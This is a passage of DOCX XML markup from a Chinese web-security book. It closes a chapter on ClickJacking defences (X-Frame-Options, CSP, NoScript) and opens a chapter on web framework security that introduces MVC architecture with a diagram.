      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>当值为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DENY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>时，浏览器会拒绝当前页面加载任何 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>页面；若值为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SAMEORIGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t>则 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>页面的地址只能为同源域名下的页面；若值为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>ALLOW-FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>，则可以定义允许 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>加载的页面地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
        <w:ind w:left="602"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>除了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>X-Frame-Options </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>之外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Content Security Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>”以及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NoScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="202"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>扩展也能够有效防御 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，这些方案为我们提供了更多的选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>5.7</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="299"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>本章讲述了一种新客户端攻击方式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>相对于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t>与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>来说，因为需要诱使用户与页面产生交互行为，因此实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>施攻击的成本更高，在网络犯罪中比较少见。但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在未来仍然有可能被攻击者利用在钓鱼、欺诈和广告作弊等方面，不可不察。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="86"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="12" w:id="69"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:b/>
          <w:sz w:val="80"/>
        </w:rPr>
        <w:t>12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>框架安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="76"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="292" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>前面的章节，我们讨论了许多浏览器、服务器端的安全问题，这些问题都有对应的解决方法。总的来说，实施安全方案，要达到好的效果，必须要完成两个目标：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="124"/>
        <w:ind w:left="503"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）安全方案正确、可靠；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="181"/>
        <w:ind w:left="503"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）能够发现所有可能存在的安全问题，不出现遗漏。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="292" w:lineRule="auto" w:before="178"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>只有深入理解漏洞原理之后，才能设计出真正有效、能够解决问题的方案，本书的许多篇</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>幅，都是介绍漏洞形成的根本原因。比如真正理解了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>注入等漏洞的产生原理后，想</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>彻底解决这些顽疾并不难。但是，方案光有效是不够的，要想设计出完美的方案，还需要解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>第二件事情，就是找到一个方法，能够让我们快速有效、不会遗漏地发现所有问题。而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>开发框架，为我们解决这个问题提供了便捷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="-15"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>框架安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="292" w:lineRule="auto" w:before="256"/>
        <w:ind w:left="203" w:right="222" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>在现代 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>开发中，使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>架构是一种流行的做法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Model-View-Co</w:t>
      </w:r>
      <w:bookmarkStart w:name="12.1  MVC框架安全" w:id="70"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>troller </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>的缩写，它将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>应用分为三层，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>层负责用户视图、页面展示等工作；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Controller </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>负责应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>用的逻辑实现，接收 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>层传入的用户请求，并转发给对应的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Model </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>做处理；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Model </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层则负责实现模型，完成数据的处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:134.399994pt;margin-top:7.713594pt;width:168.4pt;height:143.2pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4144;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="2688,154" coordsize="3368,2864">
            <v:shape style="position:absolute;left:2688;top:154;width:3346;height:2864" type="#_x0000_t75" stroked="false">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:shape style="position:absolute;left:2712;top:365;width:1223;height:1135" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="772" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>HTTP</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="376" w:lineRule="auto" w:before="58"/>
                      <w:ind w:left="0" w:right="-1" w:firstLine="720"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Request BROWSER</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="135" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="717" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>HTTP</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="60"/>
                      <w:ind w:left="598" w:right="9" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Response</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:3950;top:422;width:1485;height:612" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="324" w:lineRule="auto" w:before="0"/>
                      <w:ind w:left="796" w:right="2" w:firstLine="31"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Execution Parameters</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="151" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>CONTROLLER</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:5503;top:859;width:553;height:168" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>MODEL</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:4929;top:1015;width:598;height:168" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Resulting</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:3523;top:1245;width:2078;height:945" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="1329" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Data Arrays</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto" w:before="0"/>
                      <w:rPr>
                        <w:sz w:val="16"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto" w:before="3"/>
                      <w:rPr>
                        <w:sz w:val="13"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="0"/>
                      <w:ind w:left="3" w:right="1600" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>GUI</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="58"/>
                      <w:ind w:left="-1" w:right="1600" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:spacing w:val="-1"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Content</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:5006;top:1723;width:748;height:398" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="76" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Resulting</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="58"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>Data Arrays</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:4161;top:2630;width:409;height:168" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="167" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                      <w:t>VIEW</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:ind w:left="0" w:right="17" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
